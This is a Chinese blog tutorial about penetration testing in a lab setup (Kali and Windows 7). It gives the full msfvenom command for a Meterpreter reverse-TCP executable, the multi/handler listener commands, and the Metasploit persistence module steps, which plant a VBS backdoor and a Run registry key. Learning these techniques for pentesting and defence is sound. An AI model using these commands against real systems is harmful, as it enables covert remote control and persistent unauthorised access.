渗透测试框架权限维持技术——Persistence模块

于 2024-03-16 22:46:27 发布
阅读量233 收藏 5
点赞数 3
分类专栏: kali 文章标签: kali msfvenom persistence
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47498728/article/details/136771183
版权

测试环境:

kali + win7

测试步骤:

1.利用MSF编写远控程序

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.163 lport=55555 -f exe -o 5555.exe

-p	漏洞利用payload
lhost	监听地址(kali地址)
lport	监听端口(这里本来想写5555的,手滑写成了55555)
-f	输出格式==生成什么类型文件
-o	文件名字

在这里插入图片描述
2.将远控程序(5555.exe)上传到靶机
在这里插入图片描述
3.msf开启监听

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.163
set lport 55555
run

payload、lhost、lport与远控程序中的要一致

在这里插入图片描述
4.在靶机上执行远控程序(5555.exe)
可以看到,直接攻击成功在这里插入图片描述
5.接下来进行权限维持,首先保存会话

background

在这里插入图片描述
6.使用Persistence模块,设置session即可
lhost和lport看一眼,后面监听会用到

use exploit/windows/local/persistence
set session 1
run

在这里插入图片描述
7.验证靶机生成的文件
路径在第6步攻击后的回显中

后门文件位置: C:\Users\HQY\AppData\Local\Temp\wVoHtlrQVeRGa.vbs
注册表位置:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ieyoNKPraZaY
在这里插入图片描述

8.再次开启监听,payload、lhost、lport要和Persistence模块里的配置一致

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.163
set lport 4444
run

在这里插入图片描述
9.重启靶机,即可再次攻击成功
在这里插入图片描述

结尾:

因为一个私信,临时赶出来的文章,希望可以帮到大家。

Spring� 胡
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
持久性框架Mobile-Persistence.zip
07-18
Mobile-Persistence(A-Team Mobile Persistence Accelerator )是一个轻量级的持久性框架,可与 Oracle 移动应用框架 (MAF)一起使用。它减轻了 RESTful 服务负载,并提供了一个完整的能够在脱机模式下使用移动...
应急响应实战笔记——权限维持篇:⑥ 三大渗透测试框架权限维持技术
君逍遥o
04-07 569
渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2287
小结下权限维持方法
Metasploit渗透测试框架基础
hanjinming110的博客
03-02 2015
MSF渗透测试框架基础
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
aggregate-persistence
05-10
Aggregate Persistence可参考:1. 简介领域驱动设计(DDD)已经被业界认为是行之有效的复杂问题解决之道。随着微服务的流行,DDD也被更多的团队采纳。然而在DDD落地时,聚合(Aggregate)的持久化一直缺少一种优雅的方式...
Doge-Persistence-Platform:后渗透持久化控制平台; Windows Persistence Platform;
05-17
Persistence-PlatformDPP windows控制持久化辅助平台在红蓝对抗/APT/高级渗透测试中,持久化控制已成为一个不可或缺的能力,虽然,Cobalt Strike与MSF已经在一定程度上满足需求,由于其具有较强特征,功能过剩,二开...
javax.persistence-2.0.5.jar
05-31
基于git事务82dd749的javax.persistence构建 org.eclipse.persistence/javax.persistence/2.0.5/javax.persistence-2.0.5.jar
Telemetry:WINDOWS TELEMETRY权限维持
03-18
今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / ...
led-Opt.Bak
05-21
毕设&课设&项目&实训- 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。
【图像加密解密】基于matlab菲涅尔域双随机相位编码图像加密解密【含Matlab源码 4548期】.mp4
05-21
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
人工智能项目+OpenCV+实例分割+Cpp实现+模型部署+qt界面+完全可用版+C++
05-21
【内容概要】 本C++项目,集成OpenCV库与实例分割模型,实现了对图像中不同对象的精确分割。项目采用先进的实例分割算法,并以C++为核心开发语言,搭配Qt框架构建用户友好型图形界面。完成模型训练后,实现了模型的高效部署,用户可直接通过QT界面上传图片,以及选择模型地址,就可获取分割后的结果。 【适用人群】 适合C++开发者、CV工程师、机器学习研究者及对AI技术有浓厚兴趣的学生群体。 【使用场景】 广泛适用于工业检测、医学影像分析、农林业病虫害识别、智能监控系统及AR增强现实等领域。无论是学术研究中的数据预处理,还是企业级产品中的图像分析功能开发,该项目都能提供坚实的技术支撑。 【目标】 项目旨在通过实战演练,帮助开发者掌握从理论到实践的全过程:包括模型选择与优化、C++接口的OpenCV操作、Qt界面设计与交互逻辑实现,直至模型的高效部署与应用。最终目标是打造一个即拿即用的实例分割工具,促进AI技术在多领域的落地应用,同时提升开发者在复杂项目。
netty-resolver-4.1.22.Final.jar
05-21
javaEE javaweb常用jar包 , 亲测可用,下载后导入到java工程中使用。
node-v4.8.6-headers.tar.xz
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Matlab实现计算器
05-21
可完美实现计算器功能,使用Matlab进行编程,可自行替换按键图标以及背景图片
华中科技大学 计算机学科学与技术学院 实验资料 课程设计-大数据导论-内含源码和说明书(可自己修改).zip
最新发布
05-21
本项目是课程设计课程实验的demo,内含源码和说明书,可以自己修改
RibbonIcon.dll
05-21
RibbonIcon.dll
目前java常用的技术框架
09-12
目前在Java开发领域中常用的技术框架包括: 1. Spring:是一个开源的框架,主要用于构建企业级的Java应用程序。 2. Hibernate:是一个开源的对象关系映射框架,用于简化数据库操作。 3. Struts:是一个基于Java Servlet的Web框架,用于构建动态Web应用程序。 4. JavaServer Faces(JSF):是一个用于开发Web界面的框架。 5. Java Persistence API (JPA):是一种用于管理Java对象和关系数据库之间映射的标准。 6. JavaServer Pages (JSP):是一种动态网页技术,用于构建动态Web页面。 7. JavaFX:是一个用于开发跨平台的Rich Internet Application(RIA)的技术。 8. Apache Tomcat:是一个开源的Java Servlet容器,用于运行Java动态网页和Web应用程序。 以上只是主要的一部分,Java技术框架非常丰富,还有很多其他的技术框架可以使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值